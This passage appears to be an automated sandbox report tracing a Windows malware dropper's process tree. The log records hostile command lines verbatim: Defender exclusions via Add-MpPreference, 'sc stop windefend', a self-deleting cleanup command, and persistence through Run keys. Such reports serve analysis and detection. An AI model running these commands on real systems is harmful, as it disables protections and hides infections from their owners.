  - Enumerates system info in registry

Level 7 process: C:\Users\Admin\Pictures\Adobe Films\nuv3nTIlFEYBrkPp1N3C1htI.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\nuv3nTIlFEYBrkPp1N3C1htI.exe"
  - Executes dropped EXE

Level 8 process: C:\Users\Admin\AppData\Local\Temp\build.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\build.exe"

Level 9 process: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit
  - Checks processor information in registry
  - Enumerates system info in registry

Level 10 process: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im build.exe /f
  - Kills process with taskkill

Level 10 process: C:\Windows\SysWOW64\timeout.exe
  Command line: timeout /t 6
  - Delays execution with timeout.exe

Level 7 process: C:\Users\Admin\Pictures\Adobe Films\dyEvj3hC2t7OMuwoWXdKUmK3.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\dyEvj3hC2t7OMuwoWXdKUmK3.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection

Level 7 process: C:\Users\Admin\Pictures\Adobe Films\024wC3SO_qVtbE4Y9Lz5RQz9.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\024wC3SO_qVtbE4Y9Lz5RQz9.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext

Level 8 process: C:\Users\Admin\Pictures\Adobe Films\024wC3SO_qVtbE4Y9Lz5RQz9.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\024wC3SO_qVtbE4Y9Lz5RQz9.exe"
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection

Level 7 process: C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe"
  - Executes dropped EXE
  - Drops startup file
  - Windows security modification
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - System policy modification
Level 8 process: C:\Users\Admin\AppData\Local\Temp\5761cbdb-fc5c-47f0-a896-c7edc400f9a5\AdvancedRun.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\5761cbdb-fc5c-47f0-a896-c7edc400f9a5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5761cbdb-fc5c-47f0-a896-c7edc400f9a5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  - Executes dropped EXE

Level 9 process: C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5761cbdb-fc5c-47f0-a896-c7edc400f9a5\test.bat"

Level 8 process: C:\Users\Admin\AppData\Local\Temp\d30d5ea6-3d98-4d92-920e-4a454e98413a\AdvancedRun.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\d30d5ea6-3d98-4d92-920e-4a454e98413a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d30d5ea6-3d98-4d92-920e-4a454e98413a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

Level 9 process: C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d30d5ea6-3d98-4d92-920e-4a454e98413a\test.bat"

Level 8 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force

Level 8 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force

Level 8 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force

Level 8 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force

Level 8 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force

Level 8 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force

Level 8 process: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe
  Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe"
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - System policy modification

Level 9 process: C:\Users\Admin\AppData\Local\Temp\6cb215d3-6359-479f-9641-70b0faee0ee0\AdvancedRun.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\6cb215d3-6359-479f-9641-70b0faee0ee0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\6cb215d3-6359-479f-9641-70b0faee0ee0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

Level 10 process: C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\6cb215d3-6359-479f-9641-70b0faee0ee0\test.bat"

Level 9 process: C:\Users\Admin\AppData\Local\Temp\0249fd11-b809-48cc-bf7c-28ee4e94f895\AdvancedRun.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\0249fd11-b809-48cc-bf7c-28ee4e94f895\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\0249fd11-b809-48cc-bf7c-28ee4e94f895\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

Level 10 process: C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0249fd11-b809-48cc-bf7c-28ee4e94f895\test.bat"

Level 11 process: C:\Windows\system32\sc.exe
  Command line: sc stop windefend

Level 9 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force

Level 9 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force

Level 9 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force

Level 9 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force

Level 9 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force

Level 10 process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8176 -s 892
  - Program crash

Level 10 process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8176 -s 892
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

Level 9 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force

Level 9 process: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe
  Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe"

Level 8 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force

Level 8 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force

Level 8 process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force

Level 8 process: C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe"
Level 7 process: C:\Users\Admin\Pictures\Adobe Films\ZP0MR34BkzoGGsDYhHusS489.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\ZP0MR34BkzoGGsDYhHusS489.exe"
  - Executes dropped EXE
  - Drops file in Program Files directory

Level 8 process: C:\Program Files (x86)\Company\NewProduct\cutm3.exe
  Command line: "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
  - Executes dropped EXE

Level 8 process: C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
  Command line: "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
  - Executes dropped EXE
  - Checks whether UAC is enabled

Level 7 process: C:\Users\Admin\Pictures\Adobe Films\F37OFtk5v9UdORoY8t4Donzo.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\F37OFtk5v9UdORoY8t4Donzo.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

Level 7 process: C:\Users\Admin\Pictures\Adobe Films\9Zb2WtRSw11ACQNzk2XLqI6n.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\9Zb2WtRSw11ACQNzk2XLqI6n.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

Level 7 process: C:\Users\Admin\Pictures\Adobe Films\VaQQKPf9T577ZPDm1uawzRQO.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\VaQQKPf9T577ZPDm1uawzRQO.exe"
  - Executes dropped EXE

Level 8 process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 280
  - Program crash

Level 7 process: C:\Users\Admin\Pictures\Adobe Films\Zx0htBgAf3gZhfn9rCPnpedY.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\Zx0htBgAf3gZhfn9rCPnpedY.exe"
  - Executes dropped EXE
  - Drops file in Program Files directory

Level 8 process: C:\Users\Admin\Documents\ZYQIPC2bbMYZliSoqUrEJ6Y4.exe
  Command line: "C:\Users\Admin\Documents\ZYQIPC2bbMYZliSoqUrEJ6Y4.exe"

Level 9 process: C:\Users\Admin\Pictures\Adobe Films\bWw9uRskntfP17tKU1kXBdT2.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\bWw9uRskntfP17tKU1kXBdT2.exe"

Level 9 process: C:\Users\Admin\Pictures\Adobe Films\hhdys4K7UWyFNobqt4GlqiEh.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\hhdys4K7UWyFNobqt4GlqiEh.exe"

Level 10 process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 276
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry

Level 9 process: C:\Users\Admin\Pictures\Adobe Films\RUc12BIkVlXMFW5crVQpYnzm.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\RUc12BIkVlXMFW5crVQpYnzm.exe"

Level 10 process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 236
  - Program crash
  - Checks processor information in registry

Level 9 process: C:\Users\Admin\Pictures\Adobe Films\_jBQw_QihoQim7DMOHzM16TN.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\_jBQw_QihoQim7DMOHzM16TN.exe"

Level 9 process: C:\Users\Admin\Pictures\Adobe Films\SPhHHgmoIuNWAEquliksedgo.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\SPhHHgmoIuNWAEquliksedgo.exe"

Level 9 process: C:\Users\Admin\Pictures\Adobe Films\LvP2JR61i9foyFZ2pnR1CRLZ.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\LvP2JR61i9foyFZ2pnR1CRLZ.exe"

Level 10 process: C:\Users\Admin\AppData\Local\Temp\is-84S07.tmp\LvP2JR61i9foyFZ2pnR1CRLZ.tmp
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-84S07.tmp\LvP2JR61i9foyFZ2pnR1CRLZ.tmp" /SL5="$303EA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\LvP2JR61i9foyFZ2pnR1CRLZ.exe"
  - Loads dropped DLL

Level 11 process: C:\Users\Admin\AppData\Local\Temp\is-IME32.tmp\ShareFolder.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-IME32.tmp\ShareFolder.exe" /S /UID=2710
  - Drops file in Drivers directory

Level 12 process: C:\Users\Admin\AppData\Local\Temp\5d-3147c-c12-591b5-e8765c26e834d\Hamivapasi.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\5d-3147c-c12-591b5-e8765c26e834d\Hamivapasi.exe"
  - Drops file in Drivers directory
  - Adds Run key to start application
  - Drops file in Program Files directory

Level 9 process: C:\Users\Admin\Pictures\Adobe Films\GVCbJgN4fvZ0RwrZvawYRPZB.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\GVCbJgN4fvZ0RwrZvawYRPZB.exe"

Level 10 process: C:\Users\Admin\AppData\Local\Temp\is-5VHNR.tmp\GVCbJgN4fvZ0RwrZvawYRPZB.tmp
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-5VHNR.tmp\GVCbJgN4fvZ0RwrZvawYRPZB.tmp" /SL5="$60300,506127,422400,C:\Users\Admin\Pictures\Adobe Films\GVCbJgN4fvZ0RwrZvawYRPZB.exe"
  - Loads dropped DLL

Level 11 process: C:\Users\Admin\AppData\Local\Temp\is-O98KM.tmp\ShareFolder.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-O98KM.tmp\ShareFolder.exe" /S /UID=2709
  - Drops file in Drivers directory
  - Adds Run key to start application
  - Drops file in Program Files directory

Level 12 process: C:\Program Files\Windows Media Player\VWVYJDUJWQ\foldershare.exe
  Command line: "C:\Program Files\Windows Media Player\VWVYJDUJWQ\foldershare.exe" /VERYSILENT

Level 12 process: C:\Users\Admin\AppData\Local\Temp\7f-cddff-8ce-d14a4-239f101d723df\Qekymoshati.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\7f-cddff-8ce-d14a4-239f101d723df\Qekymoshati.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721513⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311913⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xb8,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=133968013⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=134317813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46513⤵
-
